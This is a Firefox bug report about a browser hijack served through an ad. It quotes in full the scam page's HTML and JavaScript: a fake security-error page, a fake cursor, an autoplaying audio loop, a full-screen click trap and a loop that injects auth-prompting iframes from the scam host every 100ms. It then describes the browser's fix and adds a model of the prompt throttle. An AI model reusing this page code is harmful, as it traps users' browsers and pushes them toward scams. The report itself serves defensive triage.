Closed Bug 1324226 Opened 8 years ago Closed 8 years ago

Browser Hijack using data URI and lots of http auth prompts

Categories

(Firefox :: Untriaged, defect)

50 Branch
defect
Not set
normal

Tracking


RESOLVED DUPLICATE of bug 1312243

People

(Reporter: kphillisjr, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Build ID: 20161208153507

Steps to reproduce:

I was browsing the internet and an advertisement agency had this on its server, and it prevented me from actively using Firefox.

Actual results:

The page displayed highly suspicious and deceptive content that effectively ignored, even bypassed, the ad-blocking add-on.

Expected results:

For my browser to not be taken over.
Looks like you got redirected there through http://hat.topimagionredirect.xyz/?adv=888111 and then http://13x70488-virus.info/en/?id=KzEgKDg4OCkgOTk2LTE0NDY . The data:text/html document that loads looks like this:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Security Update Error 0xB9730637</title>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){animateDiv();});
function makeNewPosition(){var h=$(window).height()-50,w=$(window).width()-50,nh=Math.floor(Math.random()*h),nw=Math.floor(Math.random()*w);return [nh,nw];}
function animateDiv(){var newq=makeNewPosition(),oldq=$(".zzfszs").offset(),speed=calcSpeed([oldq.top,oldq.left],newq);$(".zzfszs").animate({top:newq[0],left:newq[1]},speed,function(){animateDiv();});};
function calcSpeed(prev,next){var x=Math.abs(prev[1]-next[1]),y=Math.abs(prev[0]-next[0]),greatest=x>y?x:y,speedModifier = 0.3,speed=Math.ceil(greatest/speedModifier);return speed;}
</script>
<style type="text/css">
@media all and (-ms-high-contrast:none){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,[base64 PNG data removed]");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}
@media screen and (-webkit-min-device-pixel-ratio:0){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,[base64 PNG data removed]");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}
@-moz-document url-prefix(){div.zzfszs{width:17px;height:25px;background-image:url("data:image/png;base64,[base64 PNG data removed]");position:fixed;z-index:100;}.aykntn{cursor:none;position:absolute;top:0;bottom:0;width:100%;}}
body{background-color:#F40000;color:#000000;font-family:Arial;font-size:13px;margin:0;text-align:center;z-index:0;}
#lataed{position:absolute;top:-100px;left:-9999px;z-index:0;}
</style>
</head>
<body>
<div class="zzfszs"></div>
<div class="aykntn">
<audio autoplay><source src="http://13x70488-virus.info/en/help.php?id=music" type="audio/mpeg"></audio>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAAA1BMVEUAAACnej3aAAAAAXRSTlMAQObYZgAAAApJREFUCNdjYAAAAAIAAeIhvDMAAAAASUVORK5CYII=" onClick="window.open('http://13x70488-virus.info/en/?id=KzEgKDg4OCkgOTk2LTE0NDY','','height='+screen.availHeight+',width='+screen.availWidth);" style="position:absolute;top:0;left:0;border:0;height:100%;width:100%;z-index:101;">
<snip two massive data: URI images>
</div>
<script type="text/javascript">
function ubrdid(){var i=document.createElement("div");i.innerHTML='<div id="lataed"><iframe src="http://13x70488-virus.info/en/report.php?id=KzEgKDg4OCkgOTk2LTE0NDY&lataed=xiefba"></iframe></div>';document.body.appendChild(i);}
window.setInterval(function(){ubrdid()},100);
</script>
<div style="position:absolute;top:-100px;left:-9999px;z-index:1;"><iframe src="http://13x70488-virus.info/about.php?q=vktrft"></iframe></div>
<div id="lataed"></div>
</body>
</html>

which looks like it's basically just adding 1 iframe every 100ms to this document.
Ah, so the frames that get added all prompt for http auth. This recently got fixed in bug 1312243. Now, after 3 such prompts, we will suppress prompts on that site and you can easily close the tab. It looks like the fix should be out with Firefox 52, which is slated for release in early March next year. It looks like the original redirect came from gamedev, so it's likely an ad loaded on that page, but I couldn't quickly reproduce the same redirect - it seems like it might be difficult to find the exact ad that triggered this unless you can easily reproduce this problem (in which case you can try tracing the ad with the network monitor devtools, if you're comfortable doing that).
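The mitigation described in the comment above, as an added example that is not Firefox's code: a model of a per-site HTTP auth prompt throttle. The limit of 3 comes from the comment; the tab/site bookkeeping, the function and class names, the reset-on-navigation rule and the placeholder hostnames are assumptions used to illustrate how such a throttle behaves against a page that injects a 401-answering iframe every 100ms.

```javascript
// Added example, not Firefox code: a model of the per-site auth-prompt
// throttle described in the comment above. The limit of 3 comes from the
// comment; the names, the tab/site bookkeeping and the reset-on-navigation
// rule are assumptions, not a description of Firefox's implementation.

const PROMPT_LIMIT = 3;

// Reduce a frame's origin to a per-site key. This approximation keeps the
// last two host labels; a real browser would consult the Public Suffix List.
function siteFor(origin) {
  const host = new URL(origin).hostname;
  return host.split(".").slice(-2).join(".");
}

class AuthPromptThrottle {
  constructor(limit = PROMPT_LIMIT) {
    this.limit = limit;
    // tabId -> Map(siteKey -> number of auth dialogs already shown)
    this.shown = new Map();
  }

  // Decide what to do with an HTTP 401/407 challenge that arrives in `tabId`
  // from a frame whose document origin is `frameOrigin`.
  // Returns "prompt" (show the dialog) or "suppress" (fail the load silently).
  handleChallenge(tabId, frameOrigin) {
    const site = siteFor(frameOrigin);
    if (!this.shown.has(tabId)) this.shown.set(tabId, new Map());
    const perSite = this.shown.get(tabId);
    const count = perSite.get(site) || 0;
    if (count >= this.limit) return "suppress";
    perSite.set(site, count + 1);
    return "prompt";
  }

  // A top-level navigation (or closing the tab) discards the tab's counters,
  // so the next site the user visits starts with a fresh budget.
  onTopLevelNavigation(tabId) {
    this.shown.delete(tabId);
  }
}

// Constructed scenario: a page injects one iframe every 100 ms and every
// frame's request answers 401, mirroring the setInterval(..., 100) loop in
// the quoted document. Hostnames are placeholders, not the ones in the bug.
function simulateHijack(frameCount, limit = PROMPT_LIMIT) {
  const throttle = new AuthPromptThrottle(limit);
  const outcomes = [];
  for (let i = 0; i < frameCount; i++) {
    outcomes.push(throttle.handleChallenge("tab-1", "http://frames.abuse.invalid"));
  }
  // A different site in the same tab is budgeted independently.
  const otherSite = throttle.handleChallenge("tab-1", "http://intranet.example.invalid");
  // Navigating the tab away resets the abusive site's counter.
  throttle.onTopLevelNavigation("tab-1");
  const afterNavigate = throttle.handleChallenge("tab-1", "http://frames.abuse.invalid");
  return { outcomes, otherSite, afterNavigate };
}

const demo = simulateHijack(6);
console.log(demo.outcomes.join(" "));          // prompt prompt prompt suppress suppress suppress
console.log(demo.otherSite, demo.afterNavigate); // prompt prompt
```

The point of the model is that the budget is keyed by site within a tab, so the hijack page burns through its three dialogs in well under a second and every later frame fails quietly, while an unrelated site that legitimately needs credentials in the same tab is unaffected and the user can close the tab.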
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Summary: Browser Hijack using "data:text/html;base64," → Browser Hijack using data URI and lots of http auth prompts
Group: firefox-core-security